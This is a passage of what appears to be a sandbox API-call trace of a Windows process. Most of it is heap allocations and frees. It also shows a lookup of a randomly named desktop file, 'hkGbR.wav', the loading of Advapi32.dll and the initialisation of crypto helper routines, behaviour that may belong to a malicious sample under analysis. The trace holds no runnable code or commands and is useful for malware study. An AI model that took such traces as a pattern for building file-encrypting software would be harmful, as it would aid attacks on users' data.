(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53770 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0184.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0184.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0184.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0184.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0184.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0184.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0184.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0184.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0184.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0184.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0184.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0184.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0184.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0184.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0184.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0184.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.222] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0184.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.223] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/hkGbR.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebbda1a0, ftCreationTime.dwHighDateTime=0x1d5f024, ftLastAccessTime.dwLowDateTime=0xea16f120, ftLastAccessTime.dwHighDateTime=0x1d5eda0, ftLastWriteTime.dwLowDateTime=0xea16f120, ftLastWriteTime.dwHighDateTime=0x1d5eda0, nFileSizeHigh=0x0, nFileSizeLow=0x106d5, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="hkGbR.wav", cAlternateFileName="")) returned 0xa87710 [0184.223] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.224] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0184.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0184.225] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0184.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0184.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.226] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0184.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.226] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.226] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0184.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0184.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.228] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0184.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.228] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.229] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0184.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: 